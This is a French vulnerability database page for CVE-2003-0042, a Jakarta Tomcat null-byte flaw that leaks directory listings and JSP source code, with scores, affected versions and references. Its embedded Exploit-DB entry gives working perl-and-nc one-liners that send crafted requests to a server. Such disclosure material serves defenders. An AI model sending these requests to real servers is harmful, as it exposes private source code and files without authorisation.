CVE-2003-0042 : Détail

CVE-2003-0042

5.55%V3
Network
2003-01-29
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Jakarta Tomcat before 3.3.1a, when used with JDK 1.3.1 or earlier, allows remote attackers to list directories even with an index.html or other file present, or obtain unprocessed source code for a JSP file, via a URL containing a null character.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 22205

Date de publication : 2003-01-25 23h00 +00:00
Auteur : Jouko Pynnönen
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/6721/info Apache Tomcat is prone to a directory/file disclosure vulnerability when used with JDK 1.3.1 or earlier. It has been reported that remote attackers may view directory contents (even when an 'index.html' or other welcome file). It is also possible for remote attackers to disclose the contents of files. This vulnerability is due to improper handling of null bytes (%00) and backslash ('\') characters in requests for web resources. GET /<null byte>.jsp HTTP/1.0 $ perl -e 'print "GET /\x00.jsp HTTP/1.0\r\n\r\n";' | nc my.server 8080 $ perl -e 'print "GET /admin/WEB-INF\\classes/ContextAdmin.java\x00.jsp HTTP/1.0\r\n\r\n";'|nc my.server 8080 $ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";'|nc my.server 8080

Products Mentioned

Configuraton 0

Apache>>Tomcat >> Version 3.0

Apache>>Tomcat >> Version 3.1

Apache>>Tomcat >> Version 3.1.1

Apache>>Tomcat >> Version 3.2

Apache>>Tomcat >> Version 3.2.1

Apache>>Tomcat >> Version 3.2.3

Apache>>Tomcat >> Version 3.2.4

Apache>>Tomcat >> Version 3.3

Apache>>Tomcat >> Version 3.3.1

Références

http://www.debian.org/security/2003/dsa-246
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.securityfocus.com/bid/6721
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=104394568616290&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/advisories/5111
Tags : vendor-advisory, x_refsource_HP
http://www.ciac.org/ciac/bulletins/n-060.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://secunia.com/advisories/7977
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/7972
Tags : third-party-advisory, x_refsource_SECUNIA